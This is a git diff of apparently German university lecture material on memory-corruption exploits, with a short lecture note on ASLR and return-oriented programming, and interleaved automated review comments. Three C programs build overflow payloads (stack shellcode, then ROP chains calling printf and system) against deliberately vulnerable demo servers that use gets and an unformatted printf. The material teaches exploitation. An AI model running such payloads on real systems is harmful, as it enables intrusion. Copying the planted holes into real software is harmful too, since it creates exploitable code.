diff --git a/20200629/bs-20200629.txt b/20200629/bs-20200629.txt
new file mode 100644
index 0000000000000000000000000000000000000000..5383b09abf5db3606a9eb9101f21965f1d2e683b
--- /dev/null
+++ b/20200629/bs-20200629.txt
@@ -0,0 +1,8 @@
+Exploits, 29.06.2020, 15:38:10
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Früher möglich: Programm in den Stack schreiben, dorthin springen.
+Heute: Nicht-ausführbarer Stack, Address Space Layout Randomization (ASLR)
+Return Oriented Programming erforderlich
+genauer: return-to-libc; noch genauer: return-to-plt
+Gezielt Winz-Funktionen anspringen, um Register zu setzen,
+danach Programm- und Bibliotheksfunktionen anspringen.
diff --git a/20200629/exploit-1.c b/20200629/exploit-1.c
new file mode 100644
index 0000000000000000000000000000000000000000..a35dee9116d764073a7a6bebee1dffa4d67ed2e7
--- /dev/null
+++ b/20200629/exploit-1.c
@@ -0,0 +1,19 @@
+#include <unistd.h>
+#include <stdint.h>
+
+int main (int argc, char **argv)
+{
+  uint64_t my_program_address = 0x7fffffffdfa0;
+  for (int i = 2; i < 0x2a; i++)
+    write (1, "a", 1);                   // zum Auffüllen, um die Rücksprung-Adresse
+  write (1, &my_program_address, 8);     // überschreiben zu können
+  for (int i = 2; i < 34; i++)
+    write (1, "A", 1);
+  write (1, "\x48\x83\xec\x60", 4);      // sub    $0x60,%rsp     hierhin erfolgt der
+  write (1, "\x48\x89\xe7", 3);          // mov    %rsp,%rdi      "Rück-"Sprung
+  write (1, "\xb8\x00\x00\x00\x00", 5);  // mov    $0x0,%eax
+  write (1, "\xe8\x26\xfe\xff\xff", 5);  // callq  0x4003e0 <printf@plt>
+  write (1, "\xeb\xfe", 2);              // while (1);
+  write (1, "\n", 1);
+  return 0;
+}
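Review bot: The hard-coded `my_program_address = 0x7fffffffdfa0` and the relative displacement inside the `callq` byte string are tied to one particular build and run of the target, and nothing in the file says which one. A header comment should name the target binary and state that these values hold only with ASLR switched off and an executable stack, which is the "Früher möglich" case in bs-20200629.txt; with either mitigation active the jump into the stack faults instead. The loop bounds `i = 2; i < 0x2a` and `i = 2; i < 34` are unexplained magic numbers that mix hex and decimal, so a named constant per padding length would make the layout readable. The literal `8` in `write (1, &my_program_address, 8)` is better written `sizeof my_program_address`, and since `argc`/`argv` are unused the signature can be `int main (void)`.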
diff --git a/20200629/exploit-1.txt b/20200629/exploit-1.txt
new file mode 100644
index 0000000000000000000000000000000000000000..974e383df36c343c8121fe13c3bf5e5a43d934aa
Binary files /dev/null and b/20200629/exploit-1.txt differ
diff --git a/20200629/exploit-2.c b/20200629/exploit-2.c
new file mode 100644
index 0000000000000000000000000000000000000000..ecaab1d7877cbaeefd9d620e7ab41686e5e93bef
--- /dev/null
+++ b/20200629/exploit-2.c
@@ -0,0 +1,26 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+  uint64_t mov_rsp_rdi = 0x555555555176;
+  uint64_t add_offset_to_rdi = 0x55555555517d;
+  uint64_t dummy = 0;
+  uint64_t printf_address = 0x7ffff7e24560;
+  uint64_t exit_address = 0x7ffff7e05ea0;
+  uint8_t overflow[OVERFLOW] = "loser";
+  uint8_t payload[] = "I 0WN U!!1!                             "
+                      "                                             ";
+  write (1, overflow, sizeof (overflow));
+  write (1, &mov_rsp_rdi, 8);
+  write (1, &add_offset_to_rdi, 8);
+  write (1, &printf_address, 8);
+  write (1, &exit_address, 8);
+  write (1, &dummy, 8);
+  write (1, payload, sizeof (payload));
+  write (1, "\n", 1);
+  return 0;
+}
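Review bot: The address literals (`mov_rsp_rdi`, `add_offset_to_rdi`, `printf_address`, `exit_address`) carry no comment saying where they come from. They look like values read out of a single debugger session with address randomisation disabled, and the `0x7ffff7e…` ones presumably depend on the exact libc build as well. A short comment per constant should name the symbol or instruction it points at and note that ASLR invalidates all of them, which is the defensive point of the lecture notes. exploit-3.c is a copy of this file that differs only in one address and the payload string, so the same comment applies there. In both files `<stdlib.h>` is included but unused, and the `8` in each `write` call would be clearer as `sizeof` of the variable being written.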
diff --git a/20200629/exploit-2.txt b/20200629/exploit-2.txt
new file mode 100644
index 0000000000000000000000000000000000000000..53b16fc729c568ce104acce9171c8f8b82d001c2
Binary files /dev/null and b/20200629/exploit-2.txt differ
diff --git a/20200629/exploit-3.c b/20200629/exploit-3.c
new file mode 100644
index 0000000000000000000000000000000000000000..a8ddbd9c5ffc3b83ba3acba1d967969324860fbd
--- /dev/null
+++ b/20200629/exploit-3.c
@@ -0,0 +1,25 @@
+#include <stdlib.h>
+#include <stdint.h>
+#include <unistd.h>
+
+#define OVERFLOW 40
+
+int main (int argc, char **argv)
+{
+  uint64_t mov_rsp_rdi = 0x555555555176;
+  uint64_t add_offset_to_rdi = 0x55555555517d;
+  uint64_t dummy = 0;
+  uint64_t system_address = 0x7ffff7e109c0;
+  uint64_t exit_address = 0x7ffff7e05ea0;
+  uint8_t overflow[OVERFLOW] = "loser";
+  uint8_t payload[] = "gimp ../common/os-layers.xcf.gz";
+  write (1, overflow, sizeof (overflow));
+  write (1, &mov_rsp_rdi, 8);
+  write (1, &add_offset_to_rdi, 8);
+  write (1, &system_address, 8);
+  write (1, &exit_address, 8);
+  write (1, &dummy, 8);
+  write (1, payload, sizeof (payload));
+  write (1, "\n", 1);
+  return 0;
+}
diff --git a/20200629/exploit-3.txt b/20200629/exploit-3.txt
new file mode 100644
index 0000000000000000000000000000000000000000..d53f1c805994e7b4e4bf9c35cb75aa493aadc79d
Binary files /dev/null and b/20200629/exploit-3.txt differ
diff --git a/20200629/server-0.c b/20200629/server-0.c
new file mode 100644
index 0000000000000000000000000000000000000000..96f8b4df4c5a467aa5d2ec424434a6a33a6f6127
--- /dev/null
+++ b/20200629/server-0.c
@@ -0,0 +1,24 @@
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+int main (void)
+{
+  char name_buffer[100];
+  char *pass_buffer;
+  char username[] = "peter";
+  char password[] = "Hi!ph1sch";
+
+  printf ("Your name, please: ");
+  gets (name_buffer);
+  printf ("Hello, ");
+  printf (name_buffer);
+  printf ("!\n");
+
+  pass_buffer = getpass ("Your password, please: ");
+  if (strcmp (name_buffer, username) == 0 && strcmp (pass_buffer, password) == 0)
+    printf ("You have access.\n");
+  else
+    printf ("Login incorrect.\n");
+  return 0;
+}
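Review bot: `gets (name_buffer)` writes into the 100-byte stack buffer with no bound, and `printf (name_buffer)` passes user input as the format string; server-1.c and server-2.c repeat the `gets` call on a 20-byte buffer. If these files are the deliberately vulnerable lecture targets, a header comment should say so, for example `/* intentionally vulnerable demo - do not reuse */`. Otherwise the calls should read `fgets (name_buffer, sizeof name_buffer, stdin)` and `printf ("%s", name_buffer)`. `getpass` can return NULL, so `pass_buffer` needs a check before it reaches `strcmp`. The user name and password are also stored as plain string literals in the binary.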
diff --git a/20200629/server-1.c b/20200629/server-1.c
new file mode 100644
index 0000000000000000000000000000000000000000..68f9eb57f5e277413a0206ed9af175033e9cda9d
--- /dev/null
+++ b/20200629/server-1.c
@@ -0,0 +1,10 @@
+#include <stdio.h>
+
+int main (void)
+{
+  char buffer[20];
+  printf ("Your name, please: ");
+  gets (buffer);
+  printf ("Hello, %s!\n", buffer);
+  return 0;
+}
diff --git a/20200629/server-2.c b/20200629/server-2.c
new file mode 100644
index 0000000000000000000000000000000000000000..4aac725ae5c30412f0952a770d1c9d9f6c1f6895
--- /dev/null
+++ b/20200629/server-2.c
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+  asm ("mov $0, %eax");
+  asm ("add $0x28, %rsp");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("mov %rsp, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("add $0x20, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  system ("clear");
+  exit (0);
+}
+
+int main (void)
+{
+  char buffer[20];
+  printf ("Your name, please: ");
+  gets (buffer);
+  printf ("Hello, %s!\n", buffer);
+  return 0;
+}
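Review bot: `stuff` has no comment explaining why it exists, and it is not called anywhere in this file. Its basic `asm` statements change `%rsp` and execute `ret` in the middle of a C function body without the compiler knowing, so an actual call would not behave like a normal function. Presumably it only serves to place fixed instruction sequences in the binary for the exercise; if so, say it in a comment such as `/* never called; provides fixed instruction sequences for the lecture demo */`. server-3.c contains an identical copy and needs the same comment.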
diff --git a/20200629/server-3.c b/20200629/server-3.c
new file mode 100644
index 0000000000000000000000000000000000000000..11c3a7ff2bf4e1f27accebd7d9caddf6d90dfb66
--- /dev/null
+++ b/20200629/server-3.c
@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+
+void stuff (void)
+{
+  asm ("mov $0, %eax");
+  asm ("add $0x28, %rsp");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("mov %rsp, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  asm ("add $0x20, %rdi");
+  asm ("ret");
+  asm ("nop");
+  asm ("nop");
+  asm ("nop");
+  system ("clear");
+  exit (0);
+}
+
+int main (void)
+{
+  char buffer[20];
+  printf ("Your name, please: ");
+  fgets (buffer, 20, stdin);
+  printf ("Hello, %s!\n", buffer);
+  return 0;
+}
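Review bot: The return value of `fgets (buffer, 20, stdin)` is not checked, so on EOF or a read error `buffer` stays uninitialised and the following `printf ("Hello, %s!\n", buffer)` reads indeterminate bytes. Suggested form: `if (fgets (buffer, sizeof buffer, stdin) == NULL) return 1;`, which also ties the bound to the array instead of repeating the literal `20`. `fgets` keeps the trailing newline, so the greeting currently prints the `!` on its own line; `buffer[strcspn (buffer, "\n")] = '\0';` (with `<string.h>`) removes it.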